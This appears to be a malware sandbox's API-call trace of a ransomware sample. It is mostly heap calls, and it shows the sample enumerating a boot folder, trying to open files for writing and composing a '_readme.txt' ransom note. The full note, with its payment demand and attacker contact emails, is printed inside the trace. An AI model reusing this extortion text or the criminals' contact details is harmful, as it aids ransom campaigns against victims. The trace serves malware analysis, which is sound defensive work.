0x325c3b0 [0227.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.894] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0227.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.894] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.894] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.894] PathFindFileNameW (pszPath="") returned="" [0227.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.894] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.895] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.895] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.895] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x37a2b08 [0227.895] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0227.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.895] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0227.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.896] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.896] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.896] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.896] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.896] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.896] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.897] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned=".mui" [0227.897] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.897] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.897] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.897] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.897] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 